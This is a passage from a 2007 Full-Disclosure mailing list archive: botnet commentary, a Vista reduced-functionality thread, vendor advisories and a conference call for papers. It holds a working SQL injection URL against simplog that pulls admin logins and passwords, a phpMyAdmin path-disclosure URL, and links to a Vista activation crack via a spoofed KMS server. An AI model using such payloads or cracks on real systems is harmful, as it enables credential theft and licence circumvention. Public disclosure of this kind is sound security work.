I need the laptop connected to > other networks to try some other software I need to test. (that tcp limit > may prove a problem for network monitoring) > > Geo. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/23553cff/attachment.html From jammer128 at gmail.com Tue Jan 2 07:38:11 2007 From: jammer128 at gmail.com (Jason Miller) Date: Tue, 2 Jan 2007 01:38:11 -0600 Subject: [Full-disclosure] Fwd: Botnets: a retrospective to 2006, and where we are headed in 2007 In-Reply-To: <829b2de40701012337m3f7c440eic15c7a2ae3087056@mail.gmail.com> References: <829b2de40701012337m3f7c440eic15c7a2ae3087056@mail.gmail.com> Message-ID: <829b2de40701012338u3db6136cn6ca04eecc6e95af@mail.gmail.com> ---------- Forwarded message ---------- From: Jason Miller Date: Jan 2, 2007 1:37 AM Subject: Re: [Full-disclosure] Botnets: a retrospective to 2006, and where we are headed in 2007 To: Gadi Evron personally i dont think its going to change at all, but with vista coming out, as far as the pcs with xp home/pro, if a serious exploit is found in those, guess whats gonna happen? every single one is going to be exploited and botted/trojaned (same thing?). and if a serious vulnerability is found in vista we're in even more trouble, with buisness versions of it out already, that could be a serious compromise to a corperate environment.. other than that.. i dont think much is really going to change unless something big happens, like every single dns provider implements dns tracking and monitering. another idea, what about ISPs actually monitering connection counts to their residental lines? i dont think over 10k connections going TO, not from a regular home connection in under a few hours is normal unless they're doing something like bittorrent with DHT enabled.. then i could see alot of traffic, but still.. ISPs really should start monitering connections and such. because most of the compromised machines are connecting to a hacked ircd, and alot of times, these are on home connections with long lease times on IP addresses (50day+). but these are just my thoughts. comments? On 12/22/06, Gadi Evron wrote: > > A few months back I released a post on where I think anti-botnets > technology is heading ( http://blogs.securiteam.com/index.php/archives/697). > Now it's time for what happened in 2006, and what we can expect from here > on. > > I am not a strong believer in such retrospective looks, as often, they are > completely biased and based on what we have seen and what we want to > see. This is why I will try and limit myself to what we know happens and > is likely to get attention, as well as what we have seen tried by bad > guys, which is working for them enough to take to the next level. > > What changed with botnets in 2006: > 1.Botnets reached a level where it is unclear today what parts of the > Internet are not compromised to an extent. Count by clean rather than > infected. > 2. Botnets have become the most significant platform from which virtually > any type of online attack and crime are launched. Botnets equal an online > infrastructure for abusive or criminal activity online. > 3. In the past year, botnets have become mainstream. From a not existent > field even in the professional realm up to a few years ago, where attacks > were happening constantly reagrdless, it has turned to the main buzzword > and occupation of the security industry today, directly and indirectly. > 4. Websites have returned to being one the most significant form of > infection for building botnets, which hadn't been the case since the late > 90s. > 5. Botnets have become the moving force behind organized crime online, > with a low-risk high-profit calculation. > 6. New technologies are finally being introduced, moving the botnet > controllers from using just (or mainly) IRC to more advanced C&C (command > and control) channels such as P2P, or multi-layered, such as DNS and IRC > on the OSI model. > 7. Botnets used to be a game of quantity. Today, when quantity is assured, > quality is becoming a high concern for botnet controllers, both in type of > > bot as well as in abilities. > > What's going to happen with botnets in 2007: > > Botnets won't change. All will remain the same as it has been for > years. Awareness however, will increase making the problem appear larger > and larger, perhaps approaching its real scale. The bad guys would utilize > their infrastructure to get more out of the bots (quality once quantity is > here) and be able to do more than just steal cash. Maximizing their > revenue. > > Further, more and more attackers unrelated to the botnet controllers will > make use of already compromised systems and existing botnets to gain > access to networks, to facilitate anything from corporate espionage and > intelligence gathering, to shame-less and open show of strength to those > who oppose them (think Blue Security), in the real world as well as the > cyber one (which to the mob is one and the same, it's the income that > speaks). > > Meaning, the existing botnets infrastructure will be utilized both in an > open fashion, due to the fact online miscreants (real-world mob) face > virtually no risk, as well as quiet and secretive uses for third-party > intelligence operations. > > Gadi Evron. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/b085738f/attachment.html From drfrancky at securax.org Tue Jan 2 11:02:12 2007 From: drfrancky at securax.org (Javor Ninov) Date: Tue, 02 Jan 2007 13:02:12 +0200 Subject: [Full-disclosure] simplog 0.9.3.2 SQL injection In-Reply-To: <814b9d50701011906wbbda3aaw20b21de847813931@mail.gmail.com> References: <45998BD5.2040303@securax.org> <814b9d50701011906wbbda3aaw20b21de847813931@mail.gmail.com> Message-ID: <459A3BB4.501@securax.org> str0ke , looks like i reinvented the wheel :-)) . i didn't make any research. a friend of mine installed the latest version of this software and voila... str0ke wrote: > Javor, > > It seems rgod found this vulnerability back in April of 2006. > > http://www.milw0rm.com/exploits/1663 > > <> > ii) > http://[target]/[path]/index.php?blogid=[sql] > http://[target]/[path]/archive.php?blogid=[sql] > http://[target]/[path]/archive.php?m=[sql] > http://[target]/[path]/archive.php?y=[sql] > > /str0ke > > On 1/1/07, Javor Ninov wrote: >> Afected Software: >> simplog up to 0.9.3.2 (latest version - 12/05/2006 ) >> >> Site: >> http://www.simplog.org >> Simplog provides an easy way for users to add blogging capabilities to >> their existing websites. Simplog is written in PHP and compatible with >> multiple databases. Simplog also features an RSS/Atom aggregator/reader. >> Powerful, yet simple >> >> Vulnerability: >> SQL Injection in archive.php >> other files probably also affected >> >> Example: >> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 >> >> >> Vendor status: >> NOT NOTIFIED >> >> >> Javor Ninov aka DrFrancky >> drfrancky shift+2 securax.org >> http://securitydot.net/ >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 189 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/a04e3ff7/attachment.bin From geoincidents at nls.net Tue Jan 2 11:10:43 2007 From: geoincidents at nls.net (Geo.) Date: Tue, 2 Jan 2007 06:10:43 -0500 Subject: [Full-disclosure] Vista Reduced Function mode triggered In-Reply-To: <002501c72e2b$65cdb540$650ba8c0@DORKA> References: <002501c72e2b$65cdb540$650ba8c0@DORKA> Message-ID: > Yeah, probably - but just for the fun of it I'm curious what happened > (unless it's some dumb user error). Well I've been running NT flavors of windows since 1994 but I'm not beyond dumb user errors. So what sort of dumb user error (besides telling the machine NO you may not have full internet access) do you think would cause reduced functionality mode to kick in? And why would it kick back off with such stealth? I mean shouldn't there be some sort of notification so admins don't spend lifetimes trying to track down why solitaire stops working? I did disable a bunch of unneeded services like ssdp discovery, upnp, windows defender, the windows firewall, ICS and BITS and stopped and started others like media center launch and media center extender. But the disabled services are still disabled and there were plenty of reboots prior to reduced functionality mode kicking in. If it takes more than simply roping the computer to a fraction of the internet then it could be any combination of things, I mean I played with it for over a week before it went into reduced functionality mode. Geo. From kevin.fielder at gmail.com Tue Jan 2 11:14:41 2007 From: kevin.fielder at gmail.com (kevin fielder) Date: Tue, 2 Jan 2007 11:14:41 +0000 Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered In-Reply-To: <40359C8680F24C42A368DF473B5B36B90105174B@KINMLVEM07.e2k.ad.ge.com> References: <829b2de40701012344r1a41e46dx3adcb507049ab79b@mail.gmail.com> <40359C8680F24C42A368DF473B5B36B90105174B@KINMLVEM07.e2k.ad.ge.com> Message-ID: <37c3e82b0701020314n4c3d10vc728aca3f11c2640@mail.gmail.com> I have no idea if the below is expected behavior or not, but for business / education etc usage you can set up a server that deals with license management and activation - thus only that and not all internal machines needs to be able to 'phone home'. The internal machines just need to be able to talk to the license management server (sorry can't recall what M$ actually call this server). This was I believe part of a recently published way to circumvent the licensing process where a VMWare image of a hacked licensing server was used. cheers K ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jason Miller Sent: 02 January 2007 07:45 To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered lol i want to see this happen in a .edu unit where you can only access the internet by going through a limited HTTP proxy that does not allow the connect function, think it would give humourous results. unless it 'phones home' by visiting a page and printing said info, which in that case it would probably be simple enough to modify the server it goes to and make it think its going to microsoft, in that event you could easily get cd keys if thats how it verifies its a real vista copy. On 1/1/07, Geo. wrote: > > > It just can't be that simple. There has to be more to what happened to > > the guy. Lots of computers are offline for several days at a time, it's > > inconceivable that they didn't test that. > > Ok, as complete as I can be in the few minutes I have to post this. > > During those three days I did a lot of poking around, stopping and starting > services, switching from wired to wireless and back, trying to view high def > video (which I still am not able to do in any video player except WMP for > some reason) installing codecs and software, running into the event ID 4226 > tcp security connect limit, etc. > > However I never got any notification of deactivation or any problem of that > sort. Then on the third day suddenly solitaire would not start up and I > couldn't get into network properties. I did a bunch of rebooting and trouble > shooting trying to figure that out but got nowhere. > > So I went back to trying to get high def video to work in Media player > classic and figured perhaps it was trying to download a codec so I removed > the routes. It didn't help the video but I quickly found network properties > started working. So then I tried solitaire and it worked. This was all > directly after removing the routes, there wasn't but a few minutes between > letting it talk to the net and these apps starting to work again. > > I decided this was probably reduced functionality in action but since I had > never seen it before I needed some way to trigger it so I could compare > since it would take 3 days to reproduce with route blocking. I disabled the > software licensing service since it claims disabling that service will kick > off reduced functionality mode. Nothing happened immediately but 24 hours > later solitaire and network properties (and now control panel) would not > start up. It was exactly the same apps and behavior. I enabled and started > the software licensing service and in seconds things returned to fully > functional just like removing the routes did. > > So it's possible the routes didn't trigger it, but removing them sure cured > it quickly so that is my guess at this point. Further testing is needed. I > won't be testing it for a couple days as I need the laptop connected to > other networks to try some other software I need to test. (that tcp limit > may prove a problem for network monitoring) > > Geo. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Larry at larryseltzer.com Tue Jan 2 11:37:25 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Tue, 2 Jan 2007 06:37:25 -0500 Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered In-Reply-To: <37c3e82b0701020314n4c3d10vc728aca3f11c2640@mail.gmail.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE08C5DD@becca.LarrySeltzer.local> >>This was I believe part of a recently published way to circumvent the licensing process where a VMWare image of a hacked licensing server was used. I'm sure it's irrelevant to the thread, but here's that story: http://www.microsoft-watch.com/content/vista/another_vista_activation_cr ack_appears.html Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of kevin fielder Sent: Tuesday, January 02, 2007 6:15 AM To: jammer128 at gmail.com; full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered I have no idea if the below is expected behavior or not, but for business / education etc usage you can set up a server that deals with license management and activation - thus only that and not all internal machines needs to be able to 'phone home'. The internal machines just need to be able to talk to the license management server (sorry can't recall what M$ actually call this server). This was I believe part of a recently published way to circumvent the licensing process where a VMWare image of a hacked licensing server was used. cheers K ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jason Miller Sent: 02 January 2007 07:45 To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered lol i want to see this happen in a .edu unit where you can only access the internet by going through a limited HTTP proxy that does not allow the connect function, think it would give humourous results. unless it 'phones home' by visiting a page and printing said info, which in that case it would probably be simple enough to modify the server it goes to and make it think its going to microsoft, in that event you could easily get cd keys if thats how it verifies its a real vista copy. On 1/1/07, Geo. wrote: > > > It just can't be that simple. There has to be more to what happened > > to the guy. Lots of computers are offline for several days at a > > time, it's inconceivable that they didn't test that. > > Ok, as complete as I can be in the few minutes I have to post this. > > During those three days I did a lot of poking around, stopping and > starting services, switching from wired to wireless and back, trying > to view high def video (which I still am not able to do in any video > player except WMP for some reason) installing codecs and software, > running into the event ID 4226 tcp security connect limit, etc. > > However I never got any notification of deactivation or any problem of > that sort. Then on the third day suddenly solitaire would not start up > and I couldn't get into network properties. I did a bunch of rebooting > and trouble shooting trying to figure that out but got nowhere. > > So I went back to trying to get high def video to work in Media player > classic and figured perhaps it was trying to download a codec so I > removed the routes. It didn't help the video but I quickly found > network properties started working. So then I tried solitaire and it > worked. This was all directly after removing the routes, there wasn't > but a few minutes between letting it talk to the net and these apps starting to work again. > > I decided this was probably reduced functionality in action but since > I had never seen it before I needed some way to trigger it so I could > compare since it would take 3 days to reproduce with route blocking. I > disabled the software licensing service since it claims disabling that > service will kick off reduced functionality mode. Nothing happened > immediately but 24 hours later solitaire and network properties (and > now control panel) would not start up. It was exactly the same apps > and behavior. I enabled and started the software licensing service and > in seconds things returned to fully functional just like removing the routes did. > > So it's possible the routes didn't trigger it, but removing them sure > cured it quickly so that is my guess at this point. Further testing is > needed. I won't be testing it for a couple days as I need the laptop > connected to other networks to try some other software I need to test. > (that tcp limit may prove a problem for network monitoring) > > Geo. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From niceman at att.net Tue Jan 2 12:33:41 2007 From: niceman at att.net (Mike N) Date: Tue, 2 Jan 2007 07:33:41 -0500 Subject: [Full-disclosure] Fwd: Vista Reduced Function mode triggered References: <829b2de40701012344r1a41e46dx3adcb507049ab79b@mail.gmail.com><40359C8680F24C42A368DF473B5B36B90105174B@KINMLVEM07.e2k.ad.ge.com> <37c3e82b0701020314n4c3d10vc728aca3f11c2640@mail.gmail.com> Message-ID: <020901c72e6a$3c774910$1e70a8c0@othello> >but for > business / education etc usage you can set up a server that deals with > license management and activation - thus only that and not all > internal machines needs to be able to 'phone home'. The internal > machines just need to be able to talk to the license management server > (sorry can't recall what M$ actually call this server). So the small 5-10 PC Lan with a secure setup/restrictive outgoing firewall now needs a license server to run Vista? (I know of several such setups). From xploitzz at gmail.com Tue Jan 2 11:54:13 2007 From: xploitzz at gmail.com (xploitzz) Date: Tue, 2 Jan 2007 11:54:13 +0000 Subject: [Full-disclosure] Vista Reduced Function mode triggered&In-Reply-To=AA4FD01470854D4F91BD71B19138DD41@control3 Message-ID: <9e931d170701020354m25d1f878pacebd758f4e3de56@mail.gmail.com> Vista apparently needs to call the mother ship quite frequently or it will go back into reduced operation mode. You can get around it by putting in a KMS server which calls home for you once every 6 months, or you can download an image of an already activated KMS vmware image, and with a few settings chganges you only need to start it up once in a while to ensure your machines stay enabled. http://www.mydigitallife.info/2006/12/14/kms-crack-method-to-activate-windows-vista-business-or-enterprise-edition-with-local-spoof-kms-server/ Joy.... -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/6fbc4ee2/attachment.html From steven.mcgrath at chigeek.com Tue Jan 2 16:55:16 2007 From: steven.mcgrath at chigeek.com (Steven McGrath) Date: Tue, 2 Jan 2007 10:55:16 -0600 Subject: [Full-disclosure] Janury 5th Chicago 2600 Meeting Information Message-ID: <28326b7c0701020855j77854bafu6267c0a6a2af2ecc@mail.gmail.com> The January Chicago 2600 Meeting is near! The meeting will be this friday at the Neighborhood Boys and Girls Club and will feature much of the same usual fun that all of you have grown to expect! [Presentation Information] - 9.00pm - Web Apps. for public terminal use (Maniac) - 10:00pm - ATM Hacking [Unconfirmed] - After hours - Wii [General Information] - Meeting Time: 7.00pm - Approx. 3-5am - Meeting Date: Friday, Jan. 5th - Place : 2501 W Irving Park Road, Chicago - More Info : http://chicago2600.net From moskito at 012.net.il Tue Jan 2 17:23:45 2007 From: moskito at 012.net.il (Tal Argoni) Date: Tue, 02 Jan 2007 19:23:45 +0200 Subject: [Full-disclosure] Inforamtion Discloser Vulnerabilities in "phpMyAdmin" Message-ID: <000001c72e92$c21d46f0$6602a8c0@new> Thanks in advance, Tal Argoni,CEH www.zion-security.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/35bbe963/attachment.html -------------- next part -------------- ?= Security Advisory =? Issue: Remote Inforamtion Discloser Vulnerabilities in "phpMyAdmin". Discovered Date: 02/01/2007 Author: Tal Argoni. [talargoni at gmail.com] Product Vendor: http://www.phpmyadmin.net/ Details: phpMyAdmin is prone to an Information Disclosure. The vulnerability exists in the "darkblue_orange" visual theme, caused by the lack of Poor configurations. By requesting the file http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php The php return a Fatal error that disclose the full path of the file on the server. Exploitation URL: http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php Vulnerable: phpMyAdmin v2.9.1.1 Solution: go to line 33 and comment the line. //$GLOBALS['cfg']['MainBackground']....; Proof Of Concept: http://www.example.com/phpMyAdmin/themes/darkblue_orange/layout.inc.php From security at mandriva.com Tue Jan 2 17:55:01 2007 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Jan 2007 10:55:01 -0700 Subject: [Full-disclosure] [ MDKSA-2007:001 ] - Update libmodplug packages fix buffer overflow vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:001 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libmodplug Date : January 2, 2007 Affected: 2007.0 _______________________________________________________________________ Problem Description: Multiple buffer overflows in MODPlug Tracker (OpenMPT) 1.17.02.43 and earlier and libmodplug 0.8 and earlier allow user-assisted remote attackers to execute arbitrary code via (1) long strings in ITP files used by the CSoundFile::ReadITProject function in soundlib/Load_it.cpp and (2) crafted modules used by the CSoundFile::ReadSample function in soundlib/Sndfile.cpp, as demonstrated by crafted AMF files. Updated packages are patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4192 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: c710c50a92587abd6f55078af2da22e7 2007.0/i586/libmodplug0-0.7-7.1mdv2007.0.i586.rpm 4cf79b5be35cdf2e4d22af922140d32e 2007.0/i586/libmodplug0-devel-0.7-7.1mdv2007.0.i586.rpm 68181a6907f78b10d3b0c379ca3fd76b 2007.0/SRPMS/libmodplug-0.7-7.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: fe5b2a2b546f98922a124b4f52cbf202 2007.0/x86_64/lib64modplug0-0.7-7.1mdv2007.0.x86_64.rpm 2b10aaf2fefcaef82512b42910d88408 2007.0/x86_64/lib64modplug0-devel-0.7-7.1mdv2007.0.x86_64.rpm 68181a6907f78b10d3b0c379ca3fd76b 2007.0/SRPMS/libmodplug-0.7-7.1mdv2007.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFmnIzmqjQ0CJFipgRAvXJAKCZgqDu2+ZEfIKMCK5eK+9ZRXSl0wCg8yjL xLoJFnjhI1dTrOo4FGnqcaw= =eJpG -----END PGP SIGNATURE----- From sftsi at hushmail.com Tue Jan 2 18:51:25 2007 From: sftsi at hushmail.com (sftsi at hushmail.com) Date: Tue, 02 Jan 2007 19:51:25 +0100 Subject: [Full-disclosure] It's all in the details, sapheal Message-ID: <20070102185125.CA135DA84A@mailserver8.hushmail.com> Dear sapheal at hack.pl, could you please supply a lot more details in the advisories that you post? They usually just say buffer overflow in DumbServer in crappyfunction(), and in case it's true and they are exploitable, it's very nice of you to discover them and tell everyone about them, but we want to see a lot more detail. What parts of the program call the vulnerable function, under what circumstances, under what configuration and compilation options, is the involved data considered trusted or untrusted, and finally, do you have any proof that the overflows are exploitable or are they just crashes that you believe to be exploitable? This goes for other people as well, not just sapheal. Regards and best wishes for the new year, SFTSI Evil Haxxx0rzzz Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 From vvandal at well.com Tue Jan 2 18:52:29 2007 From: vvandal at well.com (Vic Vandal) Date: Tue, 2 Jan 2007 10:52:29 -0800 (PST) Subject: [Full-disclosure] CarolinaCon 2007 - Call for Speakers/Papers Message-ID: InfoSec professionals, h4x0rs, script kidz, posers, and government spies: "CarolinaCon" is back again! Yes, for about the price of your average movie admission with popcorn and a drink, YOU are invited to join us for yet another intimate and informative weekend of technology education. What is this "CarolinaCon"? CarolinaCon is an annual Technology Conference whose mission/purpose is to; - enhance local and global awareness of current technology issues and developments, - provide affordable technology education sessions to the unwashed masses, - deliver varied/informative/interesting presentations on a wide variety of InfoSec/hacking/technology/science topics, and - mix in enough entertainment and side contests/challenges to make for a truly fun event. When/Where is CarolinaCon? This year's event will be held on the weekend of April 20th-22nd, 2007. The event will mostly occur at the Holiday Inn in Chapel Hill, NC. Chapel Hill is about 30 minutes from Raleigh, Durham, and Research Triangle Park. Who develops/delivers CarolinaCon? CarolinaCon is proudly brought to you by "The CarolinaCon Group". The CarolinaCon Group is a non-profit organization registered in the state of NC, dedicated to educating the local and global communities about technology, information/network/computer security, and information rights. The CarolinaCon Group is also closely associated with various "2600" chapters across NC, SC, TN, VA, LA, DC, and NY. Many of the volunteers who help develop and deliver CarolinaCon come from those chapters. What events will be at CarolinaCon? CarolinaCon is mainly about the talks (presentations/demos). Alongside of those we'll surely have several other technology-related contests/challenges, as we've had in past years. Details on those will be announced soon. Who will be presenting which topics this year? That's where YOU possibly come in. If you are somewhat knowledgeable in some interesting field of technology, hacking, science, etc., and are interested in speaking/presenting at CarolinaCon, we invite you to submit your proposal (in brief) for our review. If you're interested in presenting please send; - your name or handle, - the topic/presentation name, - estimated time-length of presentation, and - a brief topic abstract ....via e-mail to: speakers carolinacon.org *NOTE: All submissions are due by mid-February 2007! Unfortunately as a non-profit dedicated to affordable education, we've made "less than $100 total profit" each of the past years and can't afford to pay anyone to speak nor cover any related expenses (sorry). However if you do speak at the Con, you will receive; - free Con admission, - a free Con t-shirt, - an invitation to a private soiree during the conference, - minimal fame and glory, and - mad props from myself and others. We value diversity, so please don't hesitate to propose your ideas no matter how outlandish. Past speakers/topics include highlights such as; - IPv6 Implementations/Demos - Tokachu (NC-2600) - Digital Media (why blue is not blue) - Lexicon (DC-2600) - Pirate Radio - Dr Anonymous (parts/places unknown) - Ethics in Hacking - Endgame (NC-2600) - Hack-Nano Project - cipz (LV-2600) - Chronology of the Phrack Microcosm - CyberSpy (SpyTech Industries) - DNS Hacks: No Resolution - Matt (NC-2600) - Gender in Hacking - Dr/Professor Holt (UNC-C) - Reverse Engineering - txs (GhettoHackers) - College of Hacking - Vic Vandal (NOLAB/504) - Building Competitive Robots - Nick Fury (NC-2600) ....and many more! All the talks were great in my humble opinion, but my "personal" favorites from past years have to be; pirate radio, nano-hacking, and the robot. The nano-hack maniac did live demonstrations that probably sterilized a few people near the stage, the robot presentation included a working "Johnny-5" type robot that the NCSSM team had built and competed with, and the pirate radio presentation was about "real" pirates who raided ships by force and then broadcast their programs from waters not in/near the continental United States (presented by one of those pirates with related photos). I'm excited! What do I do know? If you're interested in speaking, send the 411 requested to: speakers carolinacon.org (by February 15th 2007) And if you're interested in attending, watch this space for more details: www.carolinacon.org ...and don't forget to mark the date on your calendar (4-20, cough)! Peace, Vic From announce-noreply at rpath.com Tue Jan 2 18:33:54 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 02 Jan 2007 13:33:54 -0500 Subject: [Full-disclosure] rPSA-2006-0234-2 firefox thunderbird Message-ID: <459aa592.z1LXQkLgrmh2LVGd%announce-noreply@rpath.com> rPath Security Advisory: 2006-0234-2 Published: 2006-12-22 Updated: 2007-01-02 Added thunderbird to advisory Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: firefox=/conary.rpath.com at rpl:devel//1/1.5.0.9-0.1-1 thunderbird=/conary.rpath.com at rpl:devel//1/1.5.0.9-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505 https://issues.rpath.com/browse/RPL-883 Description: Previous versions of the firefox package are vulnerable to multiple types of attacks, including one that enables an attacker to run arbitrary attacker-provided executable code if JavaScript is enabled. 29 December 2006 Update: The thunderbird package has also been updated to address the same vulnerabilities. From rajesh.sethumadhavan at yahoo.com Tue Jan 2 17:42:06 2007 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Tue, 2 Jan 2007 23:12:06 +0530 Subject: [Full-disclosure] =?windows-1252?q?Google=92s_blacklisted_url_dat?= =?windows-1252?q?abase_=28phishing_url_database=29?= Message-ID: It is possible to access google`s blacklisted url database ( phishing url database ) http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goog-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 This database (Part of Google Safe Browsing) can be used in any anti-phishing commercial softwares :) Regards Rajesh Sethumadhavan http://www.xdisclose.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/0d3a8573/attachment.html From security at mandriva.com Tue Jan 2 20:05:02 2007 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Jan 2007 13:05:02 -0700 Subject: [Full-disclosure] [ MDKSA-2007:002 ] - Updated kernel packages fix multiple vulnerabilities and bugs Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:002 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kernel Date : January 2, 2007 Affected: 2007.0 _______________________________________________________________________ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: The Linux kernel does not properly save or restore EFLAGS during a context switch, or reset the flags when creating new threads, which could allow a local user to cause a Denial of Service (process crash) (CVE-2006-5173). The seqfile handling in the 2.6 kernel up to 2.6.18 allows local users to cause a DoS (hang or oops) via unspecified manipulations that trigger an infinite loop while searching for flowlabels (CVE-2006-5619). An integer overflow in the 2.6 kernel prior to 2.6.18.4 could allow a local user to execute arbitrary code via a large maxnum value in an ioctl request (CVE-2006-5751). A race condition in the ISO9660 filesystem handling could allow a local user to cause a DoS (infinite loop) by mounting a crafted ISO9660 filesystem containing malformed data structures (CVE-2006-5757). A vulnerability in the bluetooth support could allow for overwriting internal CMTP and CAPI data structures via malformed packets (CVE-2006-6106). The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels immediately and reboot to effect the fixes. In addition to these security fixes, other fixes have been included such as: - added the marvell IDE driver - use a specific driver Jmicron chipsets rather than using a generic one - updated the sky2 driver to fix some network hang issues To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5173 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5751 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5757 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6106 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 7eba457234782c9f83c47cd26be3de80 2007.0/i586/kernel-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 80f104e8ff3081e7e868e3482f50fd81 2007.0/i586/kernel-enterprise-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 72964c8645531460b742f9e54d118488 2007.0/i586/kernel-legacy-2.6.17.8mdv-1-1mdv2007.0.i586.rpm bc52255a4290284600dfc0e97e5797cd 2007.0/i586/kernel-source-2.6.17.8mdv-1-1mdv2007.0.i586.rpm fbfc24233bf616eab08b247194210fe7 2007.0/i586/kernel-source-stripped-2.6.17.8mdv-1-1mdv2007.0.i586.rpm e30ec4041c80756ab8e004b6335337cd 2007.0/i586/kernel-xen0-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 4da4e24805a2a2301bf7f97f6e0fb974 2007.0/i586/kernel-xenU-2.6.17.8mdv-1-1mdv2007.0.i586.rpm 0cb62354da7ae0bd1dd6b851bedd9496 